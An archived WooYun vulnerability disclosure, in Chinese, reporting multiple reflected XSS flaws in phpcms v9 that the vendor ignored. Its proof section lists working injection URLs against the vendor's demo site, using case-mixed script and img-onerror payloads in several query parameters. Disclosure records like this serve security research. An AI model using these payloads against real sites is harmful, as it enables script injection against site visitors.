当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04316

漏洞标题:phpcms v9存在多个跨站漏洞

相关厂商:盛大网络

漏洞作者: teamtopkarl

提交时间:2012-02-08 12:18

修复时间:2012-02-13 12:18

公开时间:2012-02-13 12:18

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-02-08: 细节已通知厂商并且等待厂商处理中
2012-02-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

phpcms v9存在多个跨站漏洞,但比较鸡叻

详细说明:

漏洞证明:

http://v9.demo.phpcms.cn:80/api.php?op=add_favorite&title=%E4%B8%AD%E5%9B%BD%E6%9C%80%E7%9F%AE%E7%94%B7%E5%AD%90%E6%83%B3%E9%95%BF%E9%AB%9840%E5%8E%98%E7%B1%B3%E9%9C%80%E8%8A%B1%E8%B4%B9180%E4%B8%87%E5%85%83&url=http%3A%2F%2Fv9.demo.phpcms.cn%2Findex.php%3Fm%3Dcontent%26c%3Dindex%26a%3Dshow%26catid%3D13%26id%3D78&0.3160169263880292&callback=jsonp1328596854578%3ciMg+SrC%3dx+OnErRoR%3dalert(64366)%3e
http://v9.demo.phpcms.cn:80/api.php?op=add_favorite&title=%E5%A5%B3%E5%AD%90%E6%80%80%E5%AD%9537%E5%91%A8%E4%BA%A7%E4%B8%8B2.3%E5%85%AC%E6%96%A4%E5%A9%B4%E5%84%BF%E4%B8%8E4.6%E5%85%AC%E6%96%A4%E5%9B%8A%E8%82%BF&url=http%3A%2F%2Fv9.demo.phpcms.cn%2Findex.php%3Fm%3Dcontent%26c%3Dindex%26a%3Dshow%26catid%3D13%26id%3D82&0.42960129296289195&callback=jsonp1328596922562%3ciMg+SrC%3dx+OnErRoR%3dalert(51145)%3e
http://v9.demo.phpcms.cn:80/api.php?op=add_favorite&title=%E6%B2%B3%E5%8C%97%E9%82%AF%E9%83%B8%E9%99%86%E7%BB%AD%E5%8F%91%E7%8E%B0%E6%AE%B7%E5%95%86%E6%97%B6%E6%9C%9F%E9%85%92%E5%99%A8&url=http%3A%2F%2Fv9.demo.phpcms.cn%2Findex.php%3Fm%3Dcontent%26c%3Dindex%26a%3Dshow%26catid%3D13%26id%3D81&0.6248862152666401&callback=jsonp1328596906281%3ciMg+SrC%3dx+OnErRoR%3dalert(82685)%3e
http://v9.demo.phpcms.cn:80/api.php?op=add_favorite&title=%E7%BE%8E10%E5%B2%81%E7%94%B7%E7%AB%A5%E9%92%93%E9%B1%BC%E9%92%93%E5%88%B0%E9%B3%84%E9%B1%BC&url=http%3A%2F%2Fv9.demo.phpcms.cn%2Findex.php%3Fm%3Dcontent%26c%3Dindex%26a%3Dshow%26catid%3D13%26id%3D79&0.8646945819074487&callback=jsonp1328596874453%3ciMg+SrC%3dx+OnErRoR%3dalert(66817)%3e
http://v9.demo.phpcms.cn:80/api.php?op=add_favorite&title=%E4%B8%AD%E5%9B%BD%E6%9C%80%E7%9F%AE%E7%94%B7%E5%AD%90%E6%83%B3%E9%95%BF%E9%AB%9840%E5%8E%98%E7%B1%B3%E9%9C%80%E8%8A%B1%E8%B4%B9180%E4%B8%87%E5%85%83&url=http%3A%2F%2Fv9.demo.phpcms.cn%2Findex.php%3Fm%3Dcontent%26c%3Dindex%26a%3Dshow%26catid%3D13%26id%3D78&0.3160169263880292&callback=jsonp1328596854578%3ciMg+SrC%3dx+OnErRoR%3dalert(64366)%3e
http://v9.demo.phpcms.cn:80/index.php?m=yp&c=com_index&userid=40%22%3e%3csCrIpT%3ealert(27521)%3c%2fsCrIpT%3e
http://v9.demo.phpcms.cn:80/index.php?m=yp&c=index&a=lists&modelid=15&areaid=&catid=0&price=%3e%3csCrIpT%3ealert(75858)%3c%2fsCrIpT%3e&tid=1&page=
http://v9.demo.phpcms.cn:80/index.php?m=yp&c=index&a=lists&modelid=15&areaid=%3e%3csCrIpT%3ealert(85585)%3c%2fsCrIpT%3e&catid=0&price=&tid=1&page=
http://v9.demo.phpcms.cn:80/index.php?m=yp&c=index&a=lists&modelid=15&areaid=&catid=0&price=&tid=1%3e%3csCrIpT%3ealert(27351)%3c%2fsCrIpT%3e&page=

修复方案:

版权声明:转载请注明来源 teamtopkarl@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-02-13 12:18

厂商回复:

漏洞Rank:1 (WooYun评价)

最新状态:

暂无